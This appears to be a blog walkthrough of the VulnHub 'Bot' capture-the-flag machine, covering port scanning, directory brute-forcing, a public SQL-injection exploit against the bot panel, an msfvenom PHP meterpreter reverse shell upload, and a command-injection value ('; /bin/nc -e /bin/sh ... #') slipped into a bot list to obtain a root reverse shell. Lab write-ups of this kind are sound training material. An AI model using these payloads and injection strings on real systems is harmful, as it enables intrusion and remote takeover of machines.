Hi
friends! Today we are going to face Bot challenge in new VM machine of vulnhub
design by Mr. Brian Wallace. In this tutorial
you will how to access root privilege by generating malicious bot. you can
download this challenge from here.
Let’s start!!!
Open the terminal of Klai
Linux to Identify the target in your network using netdiscover command.
Netdiscover
From screenshot you can
see the highlighted target IP :
192.168.1.105
Enumerate open port of targeted IP using nmap therefore
type following command:
nmap -p- -Pn
192.168.1.105
From its scanning result we come to know that port 22, 80, 111, 55844 are open ports.
Seeing
as port 80 is open I come across towards browser and look at target IP 192.168.1.105.
Here the web page was pointing out towards two more different links “Panel” and
“Dexter Analysis for a different botnet”.
When
I visit to second link it was redirected to another web site and I found this
link is not for our use but when I click on “panel” this linked me to a login
page.
So
now I was at login page and I have no idea for its username: password here I
also try sql login form injection but couldn’t breach this login page.
Now
next I choose dirbuster for directory brute force attack to step forward in
expectation to get some directories inside it.
From
screenshot you can perceive the files and directories which I found through
brute force attack. Next we need to explore these directories in browser so
that we can find our any clue to breach login page.
I
start with upload.php where we can upload our malicious file or backdoor as you
can see from screenshot I try to upload hacked.php file but nothing happened.
Then I try to explore another directory but unable to find any clue regarding
this task.
When
I investigate more, then after wasting much I found apart from all directories
only gateway.php was suffering from blind SQL injection vulnerable but here the
post parameter was encoded with base 64.
Now
attacker has two options either configure sqlmap to retrieve credential or
download relevant exploit Dexter Casino Loader
SQL Injection given by Brian Wallace. I had
use this exploit to find out login credential. You can download it from here.
Once you have downloaded it then type following command
in terminal:
Python 31686.py
dump http://192.168.1.106/Panel/gateway.php
Now you will get login credential for bot panel.
Then I typed above fetched username and password into login
form.
The panel has three basic
features; bot control, dump viewer, and
file upload. Without wasting time I click on
upload options.
Now again I will try to upload php backdoor so that we get
reverse connection of target system.
Now use msfvenom to generate malicious PHP script and
type following command.
msfvenom -p
php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw
From
screenshot you can read the generated PHP script, at this instant we need to copy the text highlighted text further we will past it inside text document and saved with shell.php and multi handler inside
metasploit.
Now
go back to upload directory and upload shell.php now you can see from given
image the shell.php file is successfully upload inside /panel/exes.
Here we are going to execute shell.php which gives
reverse connection in metasploit framework.
192.168.1.105/panel/exes
Awesome! We
have victim’s metrepreter session
Metrepreter >
ls
Metrepreter >
cd var/www
Metrepreter >
ls
Inside /var/www I found my bot file antitamper.list, now first we will download it
Metrepreter
>download antitamper.list /root/Desktop
Here you can read the downloaded file then add you malicious
bot inside it
Now I have add my malicious bot then upload it again inside /var/www and start netcat
for reverse connection then run antitamper.py
"shell":
"'; /bin/nc -e /bin/sh 192.168.1.104 4444 #",
Nc –nlvp 4444
id
Hurray!!! We have
got root connection.
0 comments:
Post a Comment